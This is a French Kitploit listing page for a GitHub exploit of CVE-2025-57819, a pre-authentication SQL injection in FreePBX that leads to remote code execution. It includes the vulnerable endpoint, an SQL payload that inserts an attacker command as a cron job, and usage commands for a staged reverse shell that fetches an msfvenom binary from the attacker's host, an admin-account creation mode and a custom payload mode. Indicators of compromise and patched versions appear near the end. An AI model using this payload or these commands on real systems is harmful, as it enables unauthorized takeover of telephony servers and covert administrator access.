Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-57819-exploit — FreePBX Pre-Auth SQLi to RCE (CVE-2025-57819) — Exploit Tout-en-Un | Kitploit
Outils/GitHubGitHub/jeanback1/cve-2025-57819-exploit
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et ÉducationRed Teaming
GitHubjeanback1/cve-2025-57819-exploit

CVE-2025-57819-exploit

FreePBX Pre-Auth SQLi to RCE (CVE-2025-57819) — Exploit Tout-en-Un

Voir le dépôt
21il y a 3 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2025-57819 — FreePBX SQLi pré-authentification vers RCE

Un exploit tout-en-un pour CVE-2025-57819, une injection SQL non authentifiée dans le module endpoint de FreePBX menant à une exécution de code à distance via injection de tâches cron.

  • CVSS : 9.8 (Critique) — CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
  • CISA KEV : Ajouté le 29 août 2025
  • Affecté : Sangoma FreePBX 15, 16, 17 avec module endpoint < 15.0.66 / < 16.0.89 / < 17.0.3
  • Corrigé dans : endpoint 15.0.66, 16.0.89, 17.0.3

Résumé de la vulnérabilité

FreePBX expose le point d'accès admin/ajax.php?module=FreePBX\modules\endpoint\ajax sans nécessiter d'authentification (CWE-288). Le paramètre brand est passé directement dans les requêtes SQL sans échappement (CWE-89), permettant à un attaquant d'injecter des instructions SQL arbitraires dans la base de données asterisk.

Chaîne d'attaque

root@kitploit:~
[Requête HTTP non authentifiée]
        │
        ▼
admin/ajax.php?module=FreePBX\...\ajax&command=model&brand=<SQLi>
        │
        ▼
Injection SQL dans la table `cron_jobs`
(INSERT avec commande contrôlée par l'attaquant, schedule="* * * * *")
        │
        ▼
Dans les ~60 secondes, le démon cron exécute la commande en tant qu'utilisateur `asterisk`
        │
        ▼
Exécution de code à distance

Capacités de l'exploit

Cet exploit supporte trois modes :

1. Reverse Shell par étapes (par défaut)

  1. Génère un binaire linux/x64/shell_reverse_tcp via msfvenom
  2. Démarre un serveur HTTP pour servir le binaire
  3. Démarre un écouteur TCP pour le shell
  4. Injecte une tâche cron via SQLi qui télécharge + exécute le binaire
  5. Lorsque la tâche cron s'exécute, vous obtenez un shell interactif
  6. Nettoie la tâche cron injectée à la sortie
root@kitploit:~
python3 cve_2025_57819_aio.py <target_url> <lhost> <lport>

Exemple :

root@kitploit:~
python3 cve_2025_57819_aio.py http://freepbx.internal 10.10.14.85 4452

Ceci utilise le port 4452 pour le reverse shell et 4453 pour le serveur HTTP de staging.

2. Création d'un utilisateur administrateur (--create-user)

Crée un nouveau compte administrateur FreePBX via SQLi. Pas de reverse shell, pas de connexion retour, pas de binaires nécessaires.

root@kitploit:~
python3 cve_2025_57819_aio.py http://freepbx.internal --create-user

3. Payload personnalisé (--payload <chemin>)

Utilisez votre propre binaire ELF au lieu d'en générer un avec msfvenom.

root@kitploit:~
python3 cve_2025_57819_aio.py http://freepbx.internal 10.10.14.85 4452 \
    --payload /chemin/vers/mon_shell.elf

Prérequis

  • Python 3.6+
  • Bibliothèque requests (pip install requests)
  • Pour le mode par étapes : Metasploit (msfvenom) ou un payload personnalisé avec --payload
  • Pour le mode --create-user : Rien d'autre que Python + requests

Fonctionnement

Vecteur d'injection SQL

Le point d'accès vulnérable est :

root@kitploit:~
GET /admin/ajax.php?module=FreePBX\modules\endpoint\ajax&command=model&template=XXX&model=XXX&brand=<SQLi>

Le paramètre brand est concaténé dans une requête SQL INSERT sans échappement. L'exploit construit l'injection comme suit :

root@kitploit:~
';INSERT INTO cron_jobs (modulename,jobname,command,...) VALUES ('X','Y','<CMD>',NULL,'* * * * *',30,1,1) --

Le -- final commente le reste de la requête originale.

Exécution cron

FreePBX utilise le sous-système cron d'Asterisk. Les tâches cron sont vérifiées chaque minute. Lorsque la planification de la tâche insérée (* * * * *) correspond, la commande s'exécute sous l'utilisateur système asterisk.

Nettoyage

Après la fin de la session (ou après un délai d'attente), l'exploit envoie une requête SQLi DELETE pour supprimer la tâche cron injectée de cron_jobs.

Indicateurs de compromission

  • Entrées inattendues dans asterisk.cron_jobs avec des noms de module/tâche aléatoires
  • Requêtes HTTP sortantes du serveur FreePBX vers des IP externes sur des ports élevés
  • Connexions reverse shell depuis l'utilisateur asterisk
  • Nouveaux comptes administrateur aléatoires dans ampusers (si mode --create-user)

Atténuation

Mettez à jour le module endpoint vers les versions corrigées :

  • 15 : >= 15.0.66
  • 16 : >= 16.0.89
  • 17 : >= 17.0.3

Références

  • NVD — CVE-2025-57819
  • Avis de sécurité GitHub — GHSA-m42g-xg4c-5f3h
  • Vulnérabilités connues exploitées par CISA
  • watchTowr Labs
  • Avis communautaire FreePBX

Avertissement

Ce logiciel est fourni à des fins éducatives et de tests de sécurité autorisés uniquement. Toute utilisation non autorisée contre des systèmes que vous ne possédez pas ou pour lesquels vous n'avez pas d'autorisation explicite est illégale. L'auteur n'est pas responsable d'une mauvaise utilisation.

Télécharger l’outil